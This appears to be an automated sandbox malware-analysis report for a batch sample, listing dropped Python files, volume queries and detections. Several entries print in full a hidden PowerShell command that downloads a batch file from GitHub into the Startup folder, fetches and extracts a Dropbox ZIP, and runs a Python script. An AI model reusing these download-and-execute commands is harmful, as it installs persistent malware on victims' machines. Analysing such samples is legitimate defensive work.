          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testcapi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_sqlite3.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\tk86t.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testinternalcapi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_queue.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_decimal.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testbuffer.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testimportmultiple.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_asyncio.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_ctypes.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-32.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-arm64.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\libffi-7.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testconsole.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_socket.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\winsound.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_multiprocessing.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_ctypes_test.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_elementtree.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_hashlib.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\unicodedata.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\select.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-64.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\pyexpat.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md.cp310-win_amd64.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -15679732462653109s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: powershell.exe, 00000002.00000002.2563196888.0000023CFC0A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: T3-03-17.bat, type: SAMPLE
          Source: Yara matchFile source: amsi64_7052.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7052, type: MEMORYSTR
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Document\python.exe "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.pyJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"Jump to behavior
          Source: C:\Users\Public\Document\python.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
          Source: C:\Users\Public\Document\python.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://github.com/ty9989/u/raw/main/ud.bat', 'c:\users\user\appdata\roaming\\microsoft\\windows\\start menu\\programs\\startup\\windowssecure.bat'); (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/t3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'c:\\users\\public\\document.zip'); add-type -assemblyname system.io.compression.filesystem; [system.io.compression.zipfile]::extracttodirectory('c:/users/public/document.zip', 'c:/users/public/document'); start-sleep -seconds 1; c:\\users\\public\\document\\python.exe c:\users\public\document\lib\prt.py; remove-item 'c:/users/public/document.zip' -force"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://github.com/ty9989/u/raw/main/ud.bat', 'c:\users\user\appdata\roaming\\microsoft\\windows\\start menu\\programs\\startup\\windowssecure.bat'); (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/t3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'c:\\users\\public\\document.zip'); add-type -assemblyname system.io.compression.filesystem; [system.io.compression.zipfile]::extracttodirectory('c:/users/public/document.zip', 'c:/users/public/document'); start-sleep -seconds 1; c:\\users\\public\\document\\python.exe c:\users\public\document\lib\prt.py; remove-item 'c:/users/public/document.zip' -force" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\__init__.cpython-310.pyc.1784788834864 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\codecs.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\codecs.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\codecs.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\codecs.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\codecs.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\codecs.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\codecs.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\codecs.cpython-310.pyc.1784788991344 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\aliases.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\aliases.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\aliases.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\aliases.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\aliases.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\aliases.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\aliases.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\aliases.cpython-310.pyc.1784788843952 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\utf_8.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\utf_8.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\utf_8.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\utf_8.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\utf_8.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\utf_8.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\utf_8.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\utf_8.cpython-310.pyc.1784788844208 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\cp1252.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\cp1252.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\cp1252.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\cp1252.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\cp1252.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\cp1252.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\cp1252.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\cp1252.cpython-310.pyc.1784788843056 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\io.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\io.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\io.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\io.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\io.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\io.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\io.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\io.cpython-310.pyc.1784793694592 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\abc.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\abc.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\abc.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\abc.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\abc.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\abc.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\abc.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\abc.cpython-310.pyc.1784793695152 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\site.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\site.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\site.cpython-310.pyc.1784793695488 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\os.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\os.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\os.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\os.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\os.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\os.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\os.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\os.cpython-310.pyc.1784793695600 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\stat.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\stat.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\stat.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\stat.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\stat.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\stat.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\stat.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\stat.cpython-310.pyc.1784793699744 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_collections_abc.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_collections_abc.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\_collections_abc.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\_collections_abc.cpython-310.pyc VolumeInformationJump to behavior
